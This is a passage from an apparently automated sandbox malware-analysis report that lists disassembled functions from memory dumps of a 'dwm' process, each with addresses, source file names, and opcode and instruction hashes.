                                                                      • Opcode Fuzzy Hash: 2aea2419dd350be5aca04bd3521452519eaf3f094047496acd3fb0bad66fac91
                                                                      • Instruction Fuzzy Hash: A7F0E56050E7C04FD71A9A3888684517FA0EF2720134A41EFC045CF1E3DA1D9C89C701
                                                                      Function 00007FFAAB47AC59 Relevance: 1.3, Strings: 1, Instructions: 30COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000021.00000002.1970888549.00007FFAAB471000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB471000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_33_2_7ffaab471000_dwm.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: M
                                                                      • API String ID: 0-3664761504
                                                                      • Opcode ID: 0dc75ec3b0b0f1b5973b2774d8e390f9b5fc0b57f939975d977d88cb41dda071
                                                                      • Instruction ID: 6642da5c5362c2b8720c4522fa14d1824a09e59127200401373c1df10afea694
                                                                      • Opcode Fuzzy Hash: 0dc75ec3b0b0f1b5973b2774d8e390f9b5fc0b57f939975d977d88cb41dda071
                                                                      • Instruction Fuzzy Hash: 0FE0657150E7C48FD71A963888698557FA4EF6720174941EEC045CF1A3EA1D9885C741
                                                                      Function 00007FFAAB453F39 Relevance: 1.3, Strings: 1, Instructions: 29COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000021.00000002.1970888549.00007FFAAB450000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB450000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_33_2_7ffaab450000_dwm.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: M
                                                                      • API String ID: 0-3664761504
                                                                      • Opcode ID: e3ac12539d2b10eb55f3fd6f5f8b859a1a48a997495f5925e8f0f48f4453c59c
                                                                      • Instruction ID: 181d6959e6145b37e27071c09ecdbee5094a168f0a5ae79c1411c31d57bb9ec4
                                                                      • Opcode Fuzzy Hash: e3ac12539d2b10eb55f3fd6f5f8b859a1a48a997495f5925e8f0f48f4453c59c
                                                                      • Instruction Fuzzy Hash: 2EF0656194E7C04FC71AD73488698557F61EF6720174A42EEC04ACF1A3DA1DCC45C751
                                                                      Function 00007FFAAB473BE9 Relevance: 1.3, Strings: 1, Instructions: 29COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000021.00000002.1970888549.00007FFAAB471000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB471000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_33_2_7ffaab471000_dwm.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: M
                                                                      • API String ID: 0-3664761504
                                                                      • Opcode ID: dd2e0a46f886103252cddd811256fbe450b12ad6ba3a5085da78d7cdb3a475e8
                                                                      • Instruction ID: 30fe285fb3144f7462b419ba4fe831f3d762adafbe91459b173b022142b815ac
                                                                      • Opcode Fuzzy Hash: dd2e0a46f886103252cddd811256fbe450b12ad6ba3a5085da78d7cdb3a475e8
                                                                      • Instruction Fuzzy Hash: AEF0E57050E7C04FD70AD7348869414BFA0EF2720134941EEC045CF1A3DA1CD885C711
                                                                      Function 00007FFAAB472539 Relevance: 1.3, Strings: 1, Instructions: 28COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000021.00000002.1970888549.00007FFAAB471000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB471000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_33_2_7ffaab471000_dwm.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: M
                                                                      • API String ID: 0-3664761504
                                                                      • Opcode ID: c5757a95ec6beab1320a8cb2cc1ad5f59b41cd23fa1a2e89d62d099f3aaee16b
                                                                      • Instruction ID: 77caddb6fa254af773627cb71959afec764102713b10ca85366777bc4bd10943
                                                                      • Opcode Fuzzy Hash: c5757a95ec6beab1320a8cb2cc1ad5f59b41cd23fa1a2e89d62d099f3aaee16b
                                                                      • Instruction Fuzzy Hash: 31F0657194A7C08FCB19DA3888A9855BF60EF6720174A42EEC045CF1A7DA2DD88ACB41
                                                                      Function 00007FFAAB47AD29 Relevance: 1.3, Strings: 1, Instructions: 28COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000021.00000002.1970888549.00007FFAAB471000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB471000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_33_2_7ffaab471000_dwm.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: M
                                                                      • API String ID: 0-3664761504
                                                                      • Opcode ID: 906a854626dc74c83dd7189e40aec860d618a4003808e0508426c040b632cd41
                                                                      • Instruction ID: c4a66ddf08b53fa0a81383682ee6730c9b94841a9b68fe8d8b89c9ab04022be3
                                                                      • Opcode Fuzzy Hash: 906a854626dc74c83dd7189e40aec860d618a4003808e0508426c040b632cd41
                                                                      • Instruction Fuzzy Hash: 38F0657190E7C48FCB1ADB7488698557FA0EF6720174A55EFC045CF1A7EA2D8889CB41
                                                                      Function 00007FFAAB47B229 Relevance: 1.3, Strings: 1, Instructions: 26COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000021.00000002.1970888549.00007FFAAB471000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB471000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_33_2_7ffaab471000_dwm.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: I
                                                                      • API String ID: 0-3707901625
                                                                      • Opcode ID: 2b698a6ebc5b36a0d445107bf54530d868cbf990d09814e7e97f06061df9b199
                                                                      • Instruction ID: a008cd5dd3ea68c49a7a6f871d611836c25210d640683a261409664c36777008
                                                                      • Opcode Fuzzy Hash: 2b698a6ebc5b36a0d445107bf54530d868cbf990d09814e7e97f06061df9b199
                                                                      • Instruction Fuzzy Hash: 49E0926144E3C04FCB06AB348875C453FA0DE2721178A40DEC045CB0B3D21E9849C702
                                                                      Function 00007FFAAB4725C9 Relevance: 1.3, Strings: 1, Instructions: 22COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000021.00000002.1970888549.00007FFAAB471000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB471000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_33_2_7ffaab471000_dwm.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: I
                                                                      • API String ID: 0-3707901625
                                                                      • Opcode ID: 64eb5e5e4d750f7659160ff548d98ffe11805b61fd02f7141648fd94b7cb76c6
                                                                      • Instruction ID: 0f74f1312c94d4367b3f86b64d29c7bed787e989357995fffc0e05907a7b0718
                                                                      • Opcode Fuzzy Hash: 64eb5e5e4d750f7659160ff548d98ffe11805b61fd02f7141648fd94b7cb76c6
                                                                      • Instruction Fuzzy Hash: 2CE01A6144F7C08FCB4AEB7488698447FA0AE6721078A41EEC049CF1B7EA2E8889C701
                                                                      Function 00007FFAAB4789A9 Relevance: 1.3, Strings: 1, Instructions: 22COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000021.00000002.1970888549.00007FFAAB471000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB471000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_33_2_7ffaab471000_dwm.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: I
                                                                      • API String ID: 0-3707901625
                                                                      • Opcode ID: e59e868506ee6fbd5b508b096e1e25ddf965de27926d9a3e97c95849bdfe97c5
                                                                      • Instruction ID: b6de03b5f97559c7f25ea08c8357f04626411faf07c42436bac23bd72c18a450
                                                                      • Opcode Fuzzy Hash: e59e868506ee6fbd5b508b096e1e25ddf965de27926d9a3e97c95849bdfe97c5
                                                                      • Instruction Fuzzy Hash: 65E01A7144F7C04FCB4AEB7488698447FB0AE6721078A40EEC049CF1B3E62E8849CB01
                                                                      Function 00007FFAAB473C5D Relevance: .3, Instructions: 272COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000021.00000002.1970888549.00007FFAAB471000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB471000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_33_2_7ffaab471000_dwm.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 2d91617efa4acf18c873551d43bfe66c18bf0da427748c87c0a7428e9bcc5e5c
                                                                      • Instruction ID: f6dc769d35c03c128c04efb1309d17ab92b5361dba283b4670dc0862a0e654d7
                                                                      • Opcode Fuzzy Hash: 2d91617efa4acf18c873551d43bfe66c18bf0da427748c87c0a7428e9bcc5e5c
                                                                      • Instruction Fuzzy Hash: E7811B22A1DA898FFA98EB28C4566B977D1FF56380F4485B9D40DC31D3DD18AC8AC3C1
                                                                      Function 00007FFAAB4408D0 Relevance: .2, Instructions: 172COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000021.00000002.1970888549.00007FFAAB440000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB440000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_33_2_7ffaab440000_dwm.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 8cbe65a97567c115e1146222241288e30c5ef19554915f3a78f7edfbfb2451e3
                                                                      • Instruction ID: 998911367f09f49b53b758e15389222f43d458d5cc4ba2ade463c100577cf6f7
                                                                      • Opcode Fuzzy Hash: 8cbe65a97567c115e1146222241288e30c5ef19554915f3a78f7edfbfb2451e3
                                                                      • Instruction Fuzzy Hash: CB412C3264C9159FD714FB6CE4889F87BE0EF8632170544BBD08ACB163DA10AC8183C1
                                                                      Function 00007FFAAB44090D Relevance: .2, Instructions: 150COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000021.00000002.1970888549.00007FFAAB440000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB440000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_33_2_7ffaab440000_dwm.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 5a5f5b088163197626dcffd0106e095313bdc8c3b359808f12b1308ed0b30cf2
                                                                      • Instruction ID: 6e7b444f3a12ca1c8cb57c66a504a0470386bd716978eb7035b5b0fe759ac43a
                                                                      • Opcode Fuzzy Hash: 5a5f5b088163197626dcffd0106e095313bdc8c3b359808f12b1308ed0b30cf2
                                                                      • Instruction Fuzzy Hash: B2413963A4E6966FE304B37CE05A9F87BD0EF86365B1444FBD04EC71A3CD08688182C1
                                                                      Function 00007FFAAB473D6A Relevance: .1, Instructions: 138COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000021.00000002.1970888549.00007FFAAB471000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB471000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_33_2_7ffaab471000_dwm.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 6ef42f1445ba622c3f18af121e7f91fbb84421da273428643fd048a0f2468c45
                                                                      • Instruction ID: 52df0bd09a6300106365a0062340c3ffb77f4d3b7c9bdfa4282347b0ccc6987c
                                                                      • Opcode Fuzzy Hash: 6ef42f1445ba622c3f18af121e7f91fbb84421da273428643fd048a0f2468c45
                                                                      • Instruction Fuzzy Hash: 6441D921B1D94A8FEA98FB2CC4566B972D2FF96350F4481B9E40DC32D7DD286C8987C1
                                                                      Function 00007FFAAB440908 Relevance: .1, Instructions: 118COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000021.00000002.1970888549.00007FFAAB440000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB440000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_33_2_7ffaab440000_dwm.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 0cc6d291224cff623f15b76e085ee268e028e3e3f7966c47599f22330fc3e73a
                                                                      • Instruction ID: 713c8b5414808e1ca5e637a988efc28f32dc33321c35014708da64902c1609a9
                                                                      • Opcode Fuzzy Hash: 0cc6d291224cff623f15b76e085ee268e028e3e3f7966c47599f22330fc3e73a
                                                                      • Instruction Fuzzy Hash: 4721D53130D8184FE768EB0CE889DB973D1FB5A32170101BAE58EC7136E911EC9287C1
                                                                      Function 00007FFAAB440960 Relevance: .1, Instructions: 116COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000021.00000002.1970888549.00007FFAAB440000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB440000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_33_2_7ffaab440000_dwm.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 7cdc3fa24eeb01ee09c68bcf985e2d98914877f888f9bd7f106ad46d7b4108a3
                                                                      • Instruction ID: bf9a726b742878e74c1f971f74936ea5530878494489669698e28a67498f9392
                                                                      • Opcode Fuzzy Hash: 7cdc3fa24eeb01ee09c68bcf985e2d98914877f888f9bd7f106ad46d7b4108a3
                                                                      • Instruction Fuzzy Hash: F7313862A0EA566FF358B77CE44A9F877D1EF85361B1444BED40FC32A3CC186C814284
                                                                      Function 00007FFAAB44116D Relevance: .1, Instructions: 108COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000021.00000002.1970888549.00007FFAAB440000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB440000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_33_2_7ffaab440000_dwm.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: bf012382655208f6df62b8ac956eff58fda6dda096123efd03c5c768dff8aaf2
                                                                      • Instruction ID: 90ca1a75074b9404457577fcabe03802cd9585cad0f0560c73c709d7205833ed
                                                                      • Opcode Fuzzy Hash: bf012382655208f6df62b8ac956eff58fda6dda096123efd03c5c768dff8aaf2
                                                                      • Instruction Fuzzy Hash: 6A31E73190DA4A8FDB45EB78C8559F97FF0FF5B310B0445BAC00EC71A2DA28A455C781
                                                                      Function 00007FFAAB440998 Relevance: .1, Instructions: 105COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000021.00000002.1970888549.00007FFAAB440000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB440000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_33_2_7ffaab440000_dwm.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 9ade0583faeae5ffc9cfc3f8778f473576955644ed04d73214a94b2c10a42e9f
                                                                      • Instruction ID: 51a8e9f5d6b7cfd0ed034a4f51f64ad8dd9b45f65467d09ad82abaab270dea35
                                                                      • Opcode Fuzzy Hash: 9ade0583faeae5ffc9cfc3f8778f473576955644ed04d73214a94b2c10a42e9f
                                                                      • Instruction Fuzzy Hash: 80312870A0AA955FE788F738C05DAB977D2EF9A354B1040BDE40EC32A3DD18AC518290
                                                                      Function 00007FFAAB440C25 Relevance: .1, Instructions: 93COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000021.00000002.1970888549.00007FFAAB440000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB440000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_33_2_7ffaab440000_dwm.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 4bb083615e438833682d76ae5d7086db558cf9ff8ce0a5baabdf8da7ec5a79f8
                                                                      • Instruction ID: 64056e63eaa9014ab7abd8c46bccc5d35144ae60fb9efe7ec9e3b88d24a3b9bf
                                                                      • Opcode Fuzzy Hash: 4bb083615e438833682d76ae5d7086db558cf9ff8ce0a5baabdf8da7ec5a79f8
                                                                      • Instruction Fuzzy Hash: DE312476A0D64ADFE301AB78D8042EC7FB0EF82351F1485B6D04DCA2D3D93829A987D1
                                                                      Function 00007FFAAB472601 Relevance: .1, Instructions: 88COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000021.00000002.1970888549.00007FFAAB471000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB471000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_33_2_7ffaab471000_dwm.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 2e68d1ae53cb2a2a288b6a9de785bf617faa61b34ccdb2aa3e64286e65373a06
                                                                      • Instruction ID: 60cb5963f67e0dad770d0a9eaa6d255d038e2203a26e2c5c5c7bb571d749d8b0
                                                                      • Opcode Fuzzy Hash: 2e68d1ae53cb2a2a288b6a9de785bf617faa61b34ccdb2aa3e64286e65373a06
                                                                      • Instruction Fuzzy Hash: 8721CB51A0EB868FE688E77D88A96756A91FF57344F0441BAD40CC35E7CC5858898392
                                                                      Function 00007FFAAB4469E3 Relevance: .1, Instructions: 68COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000021.00000002.1970888549.00007FFAAB440000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB440000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_33_2_7ffaab440000_dwm.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 60328c0765cd3c0e75bf6114b16701fcc33fb652cd3c6816f28481a9b1aaea77
                                                                      • Instruction ID: db6e507213296219568c7cdc50d4b57892699783b4cf277b356391641eaac2c0
                                                                      • Opcode Fuzzy Hash: 60328c0765cd3c0e75bf6114b16701fcc33fb652cd3c6816f28481a9b1aaea77
                                                                      • Instruction Fuzzy Hash: 9521EB30D18969CFEB65DB04C454BE9B3E1FB59314F1485EAC40EE3291CA79AE88CB80
                                                                      Function 00007FFAAB446F3D Relevance: .1, Instructions: 57COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000021.00000002.1970888549.00007FFAAB440000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB440000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_33_2_7ffaab440000_dwm.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: a20c2f16be8a5cf93c1741d7f0eecc350c1d05bc538523981da2460913dae605
                                                                      • Instruction ID: 239fc04a3d08b4a6a2dd6a6ab780083395807f37b6dc89078ff0fd2797dbc660
                                                                      • Opcode Fuzzy Hash: a20c2f16be8a5cf93c1741d7f0eecc350c1d05bc538523981da2460913dae605
                                                                      • Instruction Fuzzy Hash: B5117030D1E9098BEB54EB18D8466F976D1FF56340F1041B9D84FD32A2ED38686946C2
                                                                      Function 00007FFAAB440C38 Relevance: .1, Instructions: 54COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000021.00000002.1970888549.00007FFAAB440000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB440000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_33_2_7ffaab440000_dwm.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 7d2bb3cf7ef24b03d8655264155837fbce6f2c0c7af57cb7afabf7b278c7a61a
                                                                      • Instruction ID: 958d5a679b9930a30a02119475dfa8c50176f44c802e02bc9f22e0f0c4c3c54e
                                                                      • Opcode Fuzzy Hash: 7d2bb3cf7ef24b03d8655264155837fbce6f2c0c7af57cb7afabf7b278c7a61a
                                                                      • Instruction Fuzzy Hash: 40119E35A0D689DFE7069B68C8401D97FB0EF83251F1485B7C489DB2A2E538266987D1
                                                                      Function 00007FFAAB440C40 Relevance: .0, Instructions: 48COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000021.00000002.1970888549.00007FFAAB440000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB440000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_33_2_7ffaab440000_dwm.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 8605c5cd2ed30e922d213fdc2c823533a094b43cd86ef09129ed663d9de93910
                                                                      • Instruction ID: 034a2b631499da161201492a205d8ecd21f19c34d31f12b54a448c79055f56c8
                                                                      • Opcode Fuzzy Hash: 8605c5cd2ed30e922d213fdc2c823533a094b43cd86ef09129ed663d9de93910
                                                                      • Instruction Fuzzy Hash: 1E11AC35A0D289DFE7029B68C4401D97FB0EF82250F1485B6C449CB2A2D63826698780
                                                                      Function 00007FFAAB446F83 Relevance: .0, Instructions: 46COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000021.00000002.1970888549.00007FFAAB440000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB440000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_33_2_7ffaab440000_dwm.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: ad5857418f803b61acc6e2da6c31959211e5dde0cadc5b271e9a3561c7aa7287
                                                                      • Instruction ID: 362b00be108e3da212128b5bf4222bc6b77c146f4163b3853cabbd2e03b6f199
                                                                      • Opcode Fuzzy Hash: ad5857418f803b61acc6e2da6c31959211e5dde0cadc5b271e9a3561c7aa7287
                                                                      • Instruction Fuzzy Hash: CB01E130A1950ACFEB54EB28D455AF872D1EF56340F1180B5D84FC72A3ED28A8694685
                                                                      Function 00007FFAAB440C48 Relevance: .0, Instructions: 42COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000021.00000002.1970888549.00007FFAAB440000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB440000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_33_2_7ffaab440000_dwm.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 0fb33bb0b3f17d59341ab15ad9c1b10f822d6eba7bcab151df063c23b6d1dc84
                                                                      • Instruction ID: dd3d352653893482c2165113a11650171e4042ff6dcd5e90ed65bf565dd30d71
                                                                      • Opcode Fuzzy Hash: 0fb33bb0b3f17d59341ab15ad9c1b10f822d6eba7bcab151df063c23b6d1dc84
                                                                      • Instruction Fuzzy Hash: 9B016935A0D389DFE706DB68C8441D9BFB0EF43340F1485F6C449DB2A2EA386A68C781
                                                                      Function 00007FFAAB446FE1 Relevance: .0, Instructions: 39COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000021.00000002.1970888549.00007FFAAB440000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB440000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_33_2_7ffaab440000_dwm.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: d07b5b26c3a0c20170229a639b96947a79ab10b6de91b9e0bc2cb91a825951a1
                                                                      • Instruction ID: d205cd1d13fa8f7ca909effce5fe6d1af4686036fd923160bdf71b7e2847470a
                                                                      • Opcode Fuzzy Hash: d07b5b26c3a0c20170229a639b96947a79ab10b6de91b9e0bc2cb91a825951a1
                                                                      • Instruction Fuzzy Hash: 8301363091941DCBEB64EB14D8456F873A1FF56341F1080F9D84FD32A2DD386DE98A85
                                                                      Function 00007FFAAB454D25 Relevance: .0, Instructions: 35COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000021.00000002.1970888549.00007FFAAB450000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB450000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_33_2_7ffaab450000_dwm.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 5fb04a8ecc67890db30c3a10eeb76e0e86e6b84df3085faa2cf8fe9194738d51
                                                                      • Instruction ID: 4c4eb48d6c3a926962e49cf5ba2bf4c679c258a3add28ef3d7d2fb2cee1dc529
                                                                      • Opcode Fuzzy Hash: 5fb04a8ecc67890db30c3a10eeb76e0e86e6b84df3085faa2cf8fe9194738d51
                                                                      • Instruction Fuzzy Hash: 25F09630A4DD0BCFF656DB18A4506B93290FF95340F118279D44EC61AAEE28EC1981C4
                                                                      Function 00007FFAAB44701E Relevance: .0, Instructions: 33COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000021.00000002.1970888549.00007FFAAB440000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB440000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_33_2_7ffaab440000_dwm.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 1251d3e82537e973c7b5756e56e94c0f5eb721292431cc287cbd807b10bf8afd
                                                                      • Instruction ID: 96d0a8341401b098fa60ff834e963995c1608b28686d2c73499279b7e334c14f
                                                                      • Opcode Fuzzy Hash: 1251d3e82537e973c7b5756e56e94c0f5eb721292431cc287cbd807b10bf8afd
                                                                      • Instruction Fuzzy Hash: CDF0D03091A509CBEA54EB14D4456F93391EF56380F1081B9DC8FD32F3DD286DAD4685
                                                                      Function 00007FFAAB478119 Relevance: .0, Instructions: 25COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000021.00000002.1970888549.00007FFAAB471000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB471000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_33_2_7ffaab471000_dwm.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: b37aa13b1bd767f24f3e470871d6dfd3a9fabd4c5c4778cd171299428205be72
                                                                      • Instruction ID: a08276fa49abe39d026f06bce9d632830a9ff94055a979ab26b8eb21608ff79e
                                                                      • Opcode Fuzzy Hash: b37aa13b1bd767f24f3e470871d6dfd3a9fabd4c5c4778cd171299428205be72
                                                                      • Instruction Fuzzy Hash: 29E04F7194E7C08FC70B973588A88A07F64DE6721174A41EAC045CF6B3DA199C4AC712
                                                                      Function 00007FFAAB455B10 Relevance: .0, Instructions: 23COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000021.00000002.1970888549.00007FFAAB450000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB450000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_33_2_7ffaab450000_dwm.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 7d552702ab8491adb02838352863212ba115fcbcd00fc4b57cdbf35e1e0c9235
                                                                      • Instruction ID: 31c1be1aecda61acda28c2d3a46695ccd06f9eaabd42630ea7bbeaf9b53ac20d
                                                                      • Opcode Fuzzy Hash: 7d552702ab8491adb02838352863212ba115fcbcd00fc4b57cdbf35e1e0c9235
                                                                      • Instruction Fuzzy Hash: 89D05E30B6090D4B8B0CA62D8858430F3D1EBAA6067D45278940BC2291ED25ECCA8B80
                                                                      Function 00007FFAAB453F50 Relevance: .0, Instructions: 22COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000021.00000002.1970888549.00007FFAAB450000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB450000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_33_2_7ffaab450000_dwm.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: b7b5e071f3789eae717b10c0ffdfc75cd0be3c54ec7eb2e14fd012d674173004
